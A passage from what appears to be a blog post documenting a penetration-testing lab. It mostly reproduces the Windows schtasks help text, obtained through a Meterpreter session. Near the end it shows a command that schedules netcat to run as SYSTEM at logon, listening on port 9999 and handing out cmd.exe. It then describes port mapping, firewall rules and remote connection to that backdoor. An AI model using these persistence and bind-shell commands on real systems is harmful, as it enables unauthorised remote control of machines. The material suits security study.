end scheduled tasks on a local or remote system. Replaces AT.exe.
Parameter List:
/Create Creates a new scheduled task.
/Delete Deletes the scheduled task(s).
/Query Displays all scheduled tasks.
/Change Changes the properties of scheduled task.
/Run Runs the scheduled task immediately.
/End Stops the currently running scheduled task.
/? Displays this help/usage.
Examples:
SCHTASKS
SCHTASKS /?
SCHTASKS /Run /?
SCHTASKS /End /?
SCHTASKS /Create /?
SCHTASKS /Delete /?
SCHTASKS /Query /?
SCHTASKS /Change /?
C:\Program Files\ps>schtasks /create /?
schtasks /create /?
SCHTASKS /Create [/S system [/U username [/P password]]]
[/RU username [/RP password]] /SC schedule [/MO modifier] [/D day]
[/I idletime] /TN taskname /TR taskrun [/ST starttime] [/M months]
[/SD startdate] [/ED enddate]
Description:
Enables an administrator to create scheduled tasks on a local or
remote systems.
Parameter List:
/S system Specifies the remote system to
connect to. If omitted the system
parameter defaults to the local
system.
/U username Specifies the user context under
which the command should execute.
/P password Specifies the password for the given
user context.
/RU username Specifies the user account (user
context) under which the task runs.
For the system account, valid values
are "", "NT AUTHORITY\SYSTEM" or
"SYSTEM".
/RP password Specifies the password for the user.
To prompt for the password, the value
must be either "*" or none.
Password will not effect for the
system account.
/SC schedule Specifies the schedule frequency.
Valid schedule types: MINUTE, HOURLY,
DAILY, WEEKLY, MONTHLY, ONCE,
ONSTART, ONLOGON, ONIDLE.
/MO modifier Refines the schedule type to allow
finer control over schedule
recurrence. Valid values are listed
in the "Modifiers" section below.
/D days Specifies the day of the week to run
the task. Valid values: MON, TUE,
WED, THU, FRI, SAT, SUN and for
MONTHLY schedules 1 - 31 (days of the
month).
/M months Specifies month(s) of the year.
Defaults to the first day of the
month. Valid values: JAN, FEB, MAR,
APR, MAY, JUN, JUL, AUG, SEP, OCT,
NOV, DEC.
/I idletime Specifies the amount of idle time to
wait before running a scheduled
ONIDLE task.
Valid range: 1 - 999 minutes.
/TN taskname Specifies a name which uniquely
identifies this scheduled task.
/TR taskrun Specifies the path and file name of
the program to be run by this
scheduled task.
Example: C:\windows\system32\calc.exe
/ST starttime Specifies the time to run the task.
The time format is HH:MM:SS (24 hour
time) for example, 14:30:00 for
2:30 PM.
/SD startdate Specifies the first date on which the
task runs. The format is
"mm/dd/yyyy".
/ED enddate Specifies the last date when the task
should run. The format is
"mm/dd/yyyy".
/? Displays this help/usage.
Modifiers: Valid values for the /MO switch per schedule type:
MINUTE: 1 - 1439 minutes.
HOURLY: 1 - 23 hours.
DAILY: 1 - 365 days.
WEEKLY: weeks 1 - 52.
ONCE: No modifiers.
ONSTART: No modifiers.
ONLOGON: No modifiers.
ONIDLE: No modifiers.
MONTHLY: 1 - 12, or
FIRST, SECOND, THIRD, FOURTH, LAST, LASTDAY.
Examples:
SCHTASKS /Create /S system /U user /P password /RU runasuser
/RP runaspassword /SC HOURLY /TN rtest1 /TR notepad
SCHTASKS /Create /S system /U domain\user /P password /SC MINUTE
/MO 5 /TN rtest2 /TR calc.exe /ST 12:00:00
/SD 10/20/2001 /ED 10/20/2001 /RU runasuser /RP
SCHTASKS /Create /SC MONTHLY /MO first /D SUN /TN game
/TR c:\windows\system32\freecell
SCHTASKS /Create /S system /U user /P password /RU runasuser
/RP runaspassword /SC WEEKLY /TN test1 /TR notepad.exe
SCHTASKS /Create /S system /U domain\user /P password /SC MINUTE
/MO 5 /TN test2 /TR c:\windows\system32\notepad.exe
/ST 18:30:00 /RU runasuser /RP *
SCHTASKS /Create /SC MONTHLY /MO first /D SUN /TN cell
/TR c:\windows\system32\freecell /RU runasuser
/* They don't give an example of how to pass arguments to a task or how to use a task path with spaces, thanks MS :| Experimentation is painful in the console with no tab completions. The easiest way to do this is to either use short pathnames (progra~1) or to create a batch file with your command line in it, then use the task to call run that. */
C:\Program Files\ps>schtasks /?
schtasks /?
SCHTASKS /parameter [arguments]
Description:
Enables an administrator to create, delete, query, change, run and
end scheduled tasks on a local or remote system. Replaces AT.exe.
Parameter List:
/Create Creates a new scheduled task.
/Delete Deletes the scheduled task(s).
/Query Displays all scheduled tasks.
/Change Changes the properties of scheduled task.
/Run Runs the scheduled task immediately.
/End Stops the currently running scheduled task.
/? Displays this help/usage.
Examples:
SCHTASKS
SCHTASKS /?
SCHTASKS /Run /?
SCHTASKS /End /?
SCHTASKS /Create /?
SCHTASKS /Delete /?
SCHTASKS /Query /?
SCHTASKS /Change /?
C:\Program Files\ps>schtasks /change /?
schtasks /change /?
SCHTASKS /Change [/S system [/U username [/P password]]] {[/RU runasuser]
[/RP runaspassword] [/TR taskrun]} /TN taskname
Description:
Changes the program to run, or user account and password used
by a scheduled task.
Parameter List:
/S system Specifies the remote system to connect to.
/U username Specifies the user context under
which the command should execute.
/P password Specifies the password for the given
user context.
/RU username Changes the user name (user context) under
which the scheduled task has to run.
For the system account, valid values are
"", "NT AUTHORITY\SYSTEM" or "SYSTEM".
/RP password Specifies a new password for the existing
user context or the password for a new
user account. Password will not effect for
the system account.
/TR taskrun Specifies a new program that the scheduled
task runs. Type the path and file name of
the program.
/TN taskname Specifies which scheduled task to change.
/? Displays this help/usage.
Examples:
SCHTASKS /Change /RP password /TN "Backup and Restore"
SCHTASKS /Change /TR restore.exe /TN "Start Restore"
SCHTASKS /Change /S system /U user /P password /RU newuser
/TN "Start Backup"
C:\Program Files\ps>schtasks /create /RU "SYSTEM" /SC ONLOGON /TN listen /TR "C:\Progra~1\ps\nc.exe -n -L -s 192.168.2.50 -p 9999 -e cmd.exe"
schtasks /create /RU "SYSTEM" /SC ONLOGON /TN listen /TR "C:\Progra~1\ps\nc.exe -n -L -s 192.168.2.50 -p 9999 -e cmd.exe"
INFO: The Schedule Task "listen" will be created under user name ("NT AUTHORITY\SYSTEM").
SUCCESS: The scheduled task "listen" has successfully been created.
C:\Program Files\ps>exit
meterpreter > exit
[*] Meterpreter session 4 closed. Reason: User exit
msf exploit(handler) >
/* After all this, I had successfully set up: portmapping on srv-DC - 192.168.2.1:9999 -> 192.168.2.50:9999 firewall rule on srv-DC - allow tcp from any to any 9999 in firewall rule on wks-xp1 - allow tcp from any to any 9999 in task scheduled to run netcat (as system) at logon, listen on 9999 and provide a command shell to any connection. I tested this and can now successfully connect from outside the gateway: nc -nvv 192.168.1.250 9999 (srv-DC OutsideNIC) */
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment